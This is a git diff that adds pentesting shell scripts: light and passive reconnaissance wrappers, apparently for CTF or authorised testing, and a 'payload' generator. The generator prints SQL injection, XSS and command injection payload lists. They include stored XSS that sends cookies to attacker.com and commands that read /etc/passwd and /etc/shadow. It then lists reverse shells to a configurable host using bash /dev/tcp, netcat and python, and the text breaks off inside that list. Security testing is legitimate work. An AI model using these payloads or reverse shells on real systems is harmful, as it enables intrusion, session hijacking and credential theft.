# Pane 2 (bottom-right): Live results dashboard
|
||||||
|
tmux select-pane -t 2
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIGHT RECON RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}HTTP Probing (httpx):${NC}'; [ -f httpx-summary.txt ] && [ -s httpx-summary.txt ] && cat httpx-summary.txt || echo ' Waiting...'; echo; echo -e '${GREEN}Screenshots (gowitness):${NC}'; [ -d screenshots ] && SCREENSHOT_COUNT=\$(ls -1 screenshots/*.png 2>/dev/null | wc -l) && echo \" Captured: \$SCREENSHOT_COUNT screenshot(s)\" && ls -1 screenshots/*.png 2>/dev/null | head -3 || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Detection:${NC}'; [ -f httpx-detailed.json ] && [ -s httpx-detailed.json ] && jq -r '.tech[]' httpx-detailed.json 2>/dev/null | sort -u | sed 's/^/ - /' | head -10 || echo ' Waiting...'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 5; done" C-m
|
||||||
|
|
||||||
|
# Focus back on httpx pane
|
||||||
|
tmux select-pane -t 0
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Tmux light-recon window created"
|
||||||
|
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Light: ${url:0:20}... <--${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Note:${NC} Light recon appears as normal browser traffic"
|
||||||
|
echo -e "${YELLOW}Note:${NC} Screenshots saved to screenshots/ subdirectory"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
run_scans_sequential() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
cd "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running httpx...${NC}"
|
||||||
|
if command -v httpx &>/dev/null; then
|
||||||
|
echo "$url" | httpx -silent -title -tech-detect -status-code -web-server -ip -o httpx-summary.txt
|
||||||
|
cat httpx-summary.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running gowitness...${NC}"
|
||||||
|
if command -v gowitness &>/dev/null; then
|
||||||
|
gowitness single "$url" --screenshot-path=./screenshots/ --disable-logging --timeout 30
|
||||||
|
ls -lh screenshots/
|
||||||
|
fi
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
|
||||||
|
echo -e "\n${GREEN}✓${NC} Light recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
url="$1"
|
||||||
|
|
||||||
|
# Validate URL
|
||||||
|
if [[ -z "$url" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} URL required"
|
||||||
|
echo "Usage: light-recon <url>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check tools
|
||||||
|
check_tools
|
||||||
|
|
||||||
|
# Run light reconnaissance
|
||||||
|
run_light_recon "$url"
|
||||||
273
scripts/pentesting/passive-recon
Executable file
273
scripts/pentesting/passive-recon
Executable file
|
|
@ -0,0 +1,273 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: passive-recon
|
||||||
|
# Description: Truly passive reconnaissance (no direct target contact)
|
||||||
|
# Usage: passive-recon <domain>
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Status indicators
|
||||||
|
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||||
|
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||||
|
readonly REDMINUS="${RED}[-]${NC}"
|
||||||
|
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}passive-recon${NC} - Truly Passive Reconnaissance v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " passive-recon <domain>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Performs 100% PASSIVE reconnaissance with ZERO target contact"
|
||||||
|
echo " All data gathered from third-party sources (DNS, certs, archives)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}WHAT IS PASSIVE?${NC}"
|
||||||
|
echo " ✓ DNS lookups (public records)"
|
||||||
|
echo " ✓ Certificate transparency logs"
|
||||||
|
echo " ✓ Wayback Machine archives"
|
||||||
|
echo " ✓ WHOIS lookups"
|
||||||
|
echo " ✓ Shodan/censys (if API keys configured)"
|
||||||
|
echo " ✓ GitHub dorking"
|
||||||
|
echo " ✓ Subfinder/amass (passive mode)"
|
||||||
|
echo
|
||||||
|
echo " ✗ Port scanning (sends packets)"
|
||||||
|
echo " ✗ Directory brute-forcing (sends HTTP requests)"
|
||||||
|
echo " ✗ Web crawling (touches target)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " passive-recon example.com"
|
||||||
|
echo " passive-recon target.htb"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " All results saved to: ./passive-recon-<domain>-<timestamp>/"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}WHY PASSIVE?${NC}"
|
||||||
|
echo " • Undetectable (no IDS/IPS alerts)"
|
||||||
|
echo " • Safe for bug bounty recon phase"
|
||||||
|
echo " • Legal (public information only)"
|
||||||
|
echo " • Fast (no rate limiting)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
check_tools() {
|
||||||
|
local missing=()
|
||||||
|
local optional_missing=()
|
||||||
|
|
||||||
|
# Core tools
|
||||||
|
command -v tmux &>/dev/null || missing+=("tmux")
|
||||||
|
command -v dig &>/dev/null || missing+=("dig")
|
||||||
|
command -v whois &>/dev/null || missing+=("whois")
|
||||||
|
command -v curl &>/dev/null || missing+=("curl")
|
||||||
|
command -v jq &>/dev/null || missing+=("jq")
|
||||||
|
|
||||||
|
# Optional tools (all passive)
|
||||||
|
command -v subfinder &>/dev/null || optional_missing+=("subfinder")
|
||||||
|
command -v amass &>/dev/null || optional_missing+=("amass")
|
||||||
|
command -v waybackurls &>/dev/null || optional_missing+=("waybackurls")
|
||||||
|
command -v gau &>/dev/null || optional_missing+=("gau")
|
||||||
|
|
||||||
|
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Optional tools missing (some scans will be skipped): ${optional_missing[*]}"
|
||||||
|
echo -e "${CYAN}Install with:${NC}"
|
||||||
|
for tool in "${optional_missing[@]}"; do
|
||||||
|
case "$tool" in
|
||||||
|
subfinder) echo " go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" ;;
|
||||||
|
amass) echo " go install -v github.com/owasp-amass/amass/v4/...@master" ;;
|
||||||
|
waybackurls) echo " go install github.com/tomnomnom/waybackurls@latest" ;;
|
||||||
|
gau) echo " go install github.com/lc/gau/v2/cmd/gau@latest" ;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir() {
|
||||||
|
local domain="$1"
|
||||||
|
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||||
|
local clean_domain=$(echo "$domain" | tr '/:' '_' | tr -d 'http')
|
||||||
|
|
||||||
|
OUTPUT_DIR="passive-recon-${clean_domain}-${timestamp}"
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check if target is localhost
|
||||||
|
check_localhost() {
|
||||||
|
local domain="$1"
|
||||||
|
|
||||||
|
if [[ "$domain" =~ ^(localhost|127\\.0\\.0\\.1|0\\.0\\.0\\.0|::1)$ ]]; then
|
||||||
|
return 0 # Is localhost
|
||||||
|
fi
|
||||||
|
return 1 # Not localhost
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main passive-recon function
|
||||||
|
run_passive_recon() {
|
||||||
|
local domain="$1"
|
||||||
|
|
||||||
|
# Strip http:// if provided
|
||||||
|
domain=$(echo "$domain" | sed 's~https\?://~~g' | sed 's~/.*~~g')
|
||||||
|
|
||||||
|
# Check if target is localhost
|
||||||
|
if check_localhost "$domain"; then
|
||||||
|
echo -e "${RED}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ ⚠️ LOCALHOST DETECTED ⚠️ ║"
|
||||||
|
echo "║ ║"
|
||||||
|
echo "║ Passive recon doesn't work on localhost! ║"
|
||||||
|
echo "║ No DNS records, certificates, or wayback data exists. ║"
|
||||||
|
echo "║ ║"
|
||||||
|
echo "║ Use instead: ║"
|
||||||
|
echo "║ web-recon http://localhost:PORT ║"
|
||||||
|
echo "║ web-attack http://localhost:PORT ║"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ Passive Reconnaissance (Zero Target Contact) ║"
|
||||||
|
echo "║ Domain: $domain"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir "$domain"
|
||||||
|
|
||||||
|
# Check if in tmux
|
||||||
|
if [[ -z "${TMUX:-}" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||||
|
run_scans_sequential "$domain"
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create tmux window with 4 panes
|
||||||
|
tmux new-window -n "--> Passive: ${domain:0:15}... <--"
|
||||||
|
|
||||||
|
# Split into 4 panes (2x2 grid)
|
||||||
|
# CRITICAL: Tmux renumbers panes during splits
|
||||||
|
# After all splits complete, panes are numbered: 1, 2, 3, 4 (NOT 0, 1, 2, 3)
|
||||||
|
# [1: DNS/WHOIS] [2: Cert Transparency]
|
||||||
|
# [3: Wayback] [4: Subdomain Enum ]
|
||||||
|
|
||||||
|
# Create 2x2 grid layout
|
||||||
|
tmux split-window -h
|
||||||
|
tmux select-pane -t 0
|
||||||
|
tmux split-window -v
|
||||||
|
tmux select-pane -t 2
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||||
|
tmux select-layout tiled
|
||||||
|
|
||||||
|
# Final pane layout after tmux renumbering: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||||
|
|
||||||
|
# Pane 1 (top-left): DNS enumeration and WHOIS
|
||||||
|
tmux select-pane -t 1
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} DNS & WHOIS lookup...${NC}' && dig '$domain' ANY +noall +answer | tee dns.txt && echo && whois '$domain' | tee whois.txt && echo -e '${GREEN}✓ DNS/WHOIS complete${NC}'" C-m
|
||||||
|
|
||||||
|
# Pane 2 (top-right): Certificate Transparency logs
|
||||||
|
tmux select-pane -t 2
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Certificate Transparency logs...${NC}' && curl -s 'https://crt.sh/?q=%.$domain&output=json' | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt && echo -e '${GREEN}✓ Cert transparency complete${NC}'" C-m
|
||||||
|
|
||||||
|
# Pane 3 (bottom-left): Wayback Machine / historical URLs
|
||||||
|
tmux select-pane -t 3
|
||||||
|
if command -v waybackurls &>/dev/null || command -v gau &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Wayback Machine historical URLs...${NC}' && (waybackurls '$domain' 2>/dev/null || gau '$domain' 2>/dev/null || echo 'No wayback tool available') | tee wayback-urls.txt && cat wayback-urls.txt | unfurl -u paths 2>/dev/null | sort -u | tee wayback-paths.txt || true && echo -e '${GREEN}✓ Wayback complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ waybackurls/gau not installed${NC}' && echo '# Install: go install github.com/tomnomnom/waybackurls@latest' && touch wayback-urls.txt" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 4 (bottom-right): Subdomain enumeration (passive only)
|
||||||
|
tmux select-pane -t 4
|
||||||
|
if command -v subfinder &>/dev/null || command -v amass &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Passive subdomain enumeration...${NC}' && (subfinder -d '$domain' -silent 2>/dev/null || amass enum -passive -d '$domain' 2>/dev/null || echo 'No subdomain tool available') | tee subdomains-enum.txt && cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt && echo -e '${GREEN}✓ Subdomain enum complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ subfinder/amass not installed${NC}' && echo '# Install: go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest' && touch subdomains-enum.txt all-subdomains.txt" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Focus back on DNS pane
|
||||||
|
tmux select-pane -t 1
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Tmux passive-recon window created"
|
||||||
|
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Passive: ${domain:0:15}... <--${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${MAGENTA}Note:${NC} 100% passive - no packets sent to target"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
run_scans_sequential() {
|
||||||
|
local domain="$1"
|
||||||
|
|
||||||
|
cd "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running DNS & WHOIS...${NC}"
|
||||||
|
dig "$domain" ANY +noall +answer | tee dns.txt
|
||||||
|
whois "$domain" | tee whois.txt
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Certificate Transparency...${NC}"
|
||||||
|
curl -s "https://crt.sh/?q=%.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Wayback Machine...${NC}"
|
||||||
|
if command -v waybackurls &>/dev/null; then
|
||||||
|
waybackurls "$domain" | tee wayback-urls.txt
|
||||||
|
elif command -v gau &>/dev/null; then
|
||||||
|
gau "$domain" | tee wayback-urls.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Subdomain enumeration (passive)...${NC}"
|
||||||
|
if command -v subfinder &>/dev/null; then
|
||||||
|
subfinder -d "$domain" -silent | tee subdomains-enum.txt
|
||||||
|
elif command -v amass &>/dev/null; then
|
||||||
|
amass enum -passive -d "$domain" | tee subdomains-enum.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
|
||||||
|
echo -e "\n${GREEN}✓${NC} Passive recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
domain="$1"
|
||||||
|
|
||||||
|
# Validate domain
|
||||||
|
if [[ -z "$domain" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Domain required"
|
||||||
|
echo "Usage: passive-recon <domain>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check tools
|
||||||
|
check_tools
|
||||||
|
|
||||||
|
# Run passive reconnaissance
|
||||||
|
run_passive_recon "$domain"
|
||||||
517
scripts/pentesting/payload
Executable file
517
scripts/pentesting/payload
Executable file
|
|
@ -0,0 +1,517 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: payload
|
||||||
|
# Description: Security payload generator with encoding and obfuscation
|
||||||
|
# Usage: payload list # List payload types
|
||||||
|
# payload sql basic # Generate basic SQL injection payloads
|
||||||
|
# payload xss reflected # Generate reflected XSS payloads
|
||||||
|
# payload cmd linux # Generate Linux command injection payloads
|
||||||
|
# payload shell reverse 10.0.0.1 # Generate reverse shell payloads
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}payload${NC} - Security Payload Generator v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " payload <TYPE> <VARIANT> [OPTIONS]"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}TYPES:${NC}"
|
||||||
|
echo -e " ${CYAN}sql${NC} SQL injection payloads"
|
||||||
|
echo -e " ${CYAN}xss${NC} Cross-site scripting payloads"
|
||||||
|
echo -e " ${CYAN}cmd${NC} Command injection payloads"
|
||||||
|
echo -e " ${CYAN}shell${NC} Reverse/bind shell payloads"
|
||||||
|
echo -e " ${CYAN}lfi${NC} Local file inclusion payloads"
|
||||||
|
echo -e " ${CYAN}xxe${NC} XML external entity payloads"
|
||||||
|
echo -e " ${CYAN}ssti${NC} Server-side template injection"
|
||||||
|
echo -e " ${CYAN}list${NC} List all available payloads"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " payload list"
|
||||||
|
echo " payload sql basic"
|
||||||
|
echo " payload xss reflected"
|
||||||
|
echo " payload cmd linux"
|
||||||
|
echo " payload shell reverse 10.10.14.5 4444"
|
||||||
|
echo " payload lfi linux"
|
||||||
|
echo " payload xxe basic"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OPTIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}-e, --encode${NC} Encode payloads (base64, url, hex)"
|
||||||
|
echo -e " ${CYAN}-o, --output${NC} Output to file"
|
||||||
|
echo -e " ${CYAN}-c, --copy${NC} Copy to clipboard"
|
||||||
|
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Clipboard helper
|
||||||
|
clip_set() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --input --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard
|
||||||
|
elif command -v pbcopy &>/dev/null; then
|
||||||
|
pbcopy
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# SQL Injection Payloads
|
||||||
|
generate_sql() {
|
||||||
|
local variant="${1:-basic}"
|
||||||
|
|
||||||
|
case "$variant" in
|
||||||
|
basic)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Basic SQL Injection
|
||||||
|
' OR '1'='1
|
||||||
|
' OR '1'='1' --
|
||||||
|
' OR '1'='1' /*
|
||||||
|
admin' --
|
||||||
|
admin' #
|
||||||
|
' OR 1=1--
|
||||||
|
' OR 1=1#
|
||||||
|
' OR 1=1/*
|
||||||
|
') OR '1'='1--
|
||||||
|
') OR ('1'='1--
|
||||||
|
|
||||||
|
# Union-based
|
||||||
|
' UNION SELECT NULL--
|
||||||
|
' UNION SELECT NULL,NULL--
|
||||||
|
' UNION SELECT NULL,NULL,NULL--
|
||||||
|
|
||||||
|
# Error-based
|
||||||
|
' AND 1=CONVERT(int,(SELECT @@version))--
|
||||||
|
' AND 1=CAST((SELECT @@version) AS int)--
|
||||||
|
|
||||||
|
# Time-based blind
|
||||||
|
'; WAITFOR DELAY '0:0:5'--
|
||||||
|
'; SELECT SLEEP(5)--
|
||||||
|
' AND SLEEP(5)--
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
auth-bypass)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Authentication Bypass
|
||||||
|
admin' OR '1'='1
|
||||||
|
admin' OR 1=1--
|
||||||
|
' OR 'a'='a
|
||||||
|
' OR 1=1 LIMIT 1--
|
||||||
|
admin'/*
|
||||||
|
' OR '1'='1'--
|
||||||
|
' OR '1'='1'#
|
||||||
|
' OR '1'='1'/*
|
||||||
|
') OR ('1'='1
|
||||||
|
admin') OR ('1'='1
|
||||||
|
admin') OR '1'='1'--
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
union)
|
||||||
|
cat << 'EOF'
|
||||||
|
# UNION-based SQL Injection
|
||||||
|
' UNION SELECT NULL--
|
||||||
|
' UNION SELECT NULL,NULL--
|
||||||
|
' UNION SELECT NULL,NULL,NULL--
|
||||||
|
' UNION SELECT NULL,NULL,NULL,NULL--
|
||||||
|
' UNION SELECT 1,2,3--
|
||||||
|
' UNION SELECT username,password FROM users--
|
||||||
|
' UNION ALL SELECT NULL--
|
||||||
|
' UNION ALL SELECT NULL,NULL--
|
||||||
|
-1' UNION SELECT NULL--
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Unknown SQL variant:${NC} $variant"
|
||||||
|
echo "Available: basic, auth-bypass, union"
|
||||||
|
return 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# XSS Payloads
|
||||||
|
generate_xss() {
|
||||||
|
local variant="${1:-basic}"
|
||||||
|
|
||||||
|
case "$variant" in
|
||||||
|
basic|reflected)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Basic XSS
|
||||||
|
<script>alert(1)</script>
|
||||||
|
<script>alert('XSS')</script>
|
||||||
|
<script>alert(document.cookie)</script>
|
||||||
|
<img src=x onerror=alert(1)>
|
||||||
|
<svg onload=alert(1)>
|
||||||
|
<body onload=alert(1)>
|
||||||
|
<iframe src="javascript:alert(1)">
|
||||||
|
<input autofocus onfocus=alert(1)>
|
||||||
|
<select autofocus onfocus=alert(1)>
|
||||||
|
<textarea autofocus onfocus=alert(1)>
|
||||||
|
<keygen autofocus onfocus=alert(1)>
|
||||||
|
<video><source onerror="alert(1)">
|
||||||
|
<audio src=x onerror=alert(1)>
|
||||||
|
|
||||||
|
# Event handlers
|
||||||
|
<div onmouseover=alert(1)>hover</div>
|
||||||
|
<marquee onstart=alert(1)>
|
||||||
|
<details open ontoggle=alert(1)>
|
||||||
|
|
||||||
|
# Breaking out of attributes
|
||||||
|
"><script>alert(1)</script>
|
||||||
|
'><script>alert(1)</script>
|
||||||
|
" onclick=alert(1)//
|
||||||
|
' onclick=alert(1)//
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
stored)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Stored XSS (persistent)
|
||||||
|
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
|
||||||
|
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
|
||||||
|
<script>new Image().src='http://attacker.com/?c='+document.cookie</script>
|
||||||
|
<script>document.location='http://attacker.com/?c='+document.cookie</script>
|
||||||
|
|
||||||
|
# With common filters bypassed
|
||||||
|
<ScRiPt>alert(1)</sCrIpT>
|
||||||
|
<script>alert(String.fromCharCode(88,83,83))</script>
|
||||||
|
<iframe src="data:text/html,<script>alert(1)</script>">
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
dom)
|
||||||
|
cat << 'EOF'
|
||||||
|
# DOM-based XSS
|
||||||
|
#<script>alert(1)</script>
|
||||||
|
#<img src=x onerror=alert(1)>
|
||||||
|
javascript:alert(1)
|
||||||
|
javascript:alert(document.domain)
|
||||||
|
javascript:alert(document.cookie)
|
||||||
|
|
||||||
|
# Hash-based
|
||||||
|
http://vulnerable.com/#<script>alert(1)</script>
|
||||||
|
http://vulnerable.com/#<img src=x onerror=alert(1)>
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Unknown XSS variant:${NC} $variant"
|
||||||
|
echo "Available: basic, reflected, stored, dom"
|
||||||
|
return 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Command Injection Payloads
|
||||||
|
generate_cmd() {
|
||||||
|
local variant="${1:-linux}"
|
||||||
|
|
||||||
|
case "$variant" in
|
||||||
|
linux)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Linux Command Injection
|
||||||
|
; whoami
|
||||||
|
| whoami
|
||||||
|
|| whoami
|
||||||
|
& whoami
|
||||||
|
&& whoami
|
||||||
|
; id
|
||||||
|
| id
|
||||||
|
`whoami`
|
||||||
|
$(whoami)
|
||||||
|
;ls -la
|
||||||
|
|ls -la
|
||||||
|
`ls -la`
|
||||||
|
$(ls -la)
|
||||||
|
|
||||||
|
# With common filters
|
||||||
|
;wh''oami
|
||||||
|
;who$()ami
|
||||||
|
;who\ami
|
||||||
|
`wh''oami`
|
||||||
|
$(wh''oami)
|
||||||
|
|
||||||
|
# Chaining
|
||||||
|
; cat /etc/passwd
|
||||||
|
| cat /etc/passwd
|
||||||
|
; cat /etc/shadow
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
windows)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Windows Command Injection
|
||||||
|
& whoami
|
||||||
|
&& whoami
|
||||||
|
| whoami
|
||||||
|
|| whoami
|
||||||
|
; whoami
|
||||||
|
%0a whoami
|
||||||
|
` whoami `
|
||||||
|
|
||||||
|
# PowerShell
|
||||||
|
; powershell -c whoami
|
||||||
|
| powershell -c whoami
|
||||||
|
& powershell -c Get-Process
|
||||||
|
|
||||||
|
# CMD
|
||||||
|
& dir
|
||||||
|
&& dir c:\
|
||||||
|
| type c:\windows\win.ini
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Unknown command injection variant:${NC} $variant"
|
||||||
|
echo "Available: linux, windows"
|
||||||
|
return 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Reverse Shell Payloads
|
||||||
|
generate_shell() {
|
||||||
|
local variant="${1:-reverse}"
|
||||||
|
local lhost="${2:-10.10.14.5}"
|
||||||
|
local lport="${3:-4444}"
|
||||||
|
|
||||||
|
case "$variant" in
|
||||||
|
reverse)
|
||||||
|
cat << EOF
|
||||||
|
# Bash Reverse Shells
|
||||||
|
bash -i >& /dev/tcp/$lhost/$lport 0>&1
|
||||||
|
bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'
|
||||||
|
0<&196;exec 196<>/dev/tcp/$lhost/$lport; sh <&196 >&196 2>&196
|
||||||
|
|
||||||
|
# Netcat Reverse Shells
|
||||||
|
nc -e /bin/sh $lhost $lport
|
||||||
|
nc -e /bin/bash $lhost $lport
|
||||||
|
nc -c bash $lhost $lport
|
||||||
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lhost $lport >/tmp/f
|
||||||
|
|
||||||
|
# Python Reverse Shells
|
||||||
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||||
|
|
||||||
|
